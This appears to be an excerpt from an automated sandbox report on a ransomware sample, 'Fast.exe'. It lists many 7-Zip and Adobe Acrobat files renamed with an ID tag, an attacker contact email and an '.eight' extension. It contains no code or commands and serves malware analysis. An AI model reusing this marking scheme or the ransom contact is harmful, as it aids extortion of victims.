Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\zh-cn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\zh-tw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\License.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Uninstall.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_reader_appicon_16.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroDunamis.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Adobe.Acrobat.Dependencies.manifest.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\adobeafp.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeLinguistic.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeXMP.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AGMGPUOptIn.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ahclient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ANCUtility.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXE8SharedExpat.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXSLE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIB.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIBUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\manifest.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_asym.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base_non_fips.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_ecc.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRClient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.sig.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cr_win_client_config.cfg.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DirectInk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. FOIA.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. Privacy Act.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\LocaleDisplayNameMap.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ExtendScript.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\JP2KLib.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\eula.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\stopwords.ENU.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFPrevHndlr.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Accessibility.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
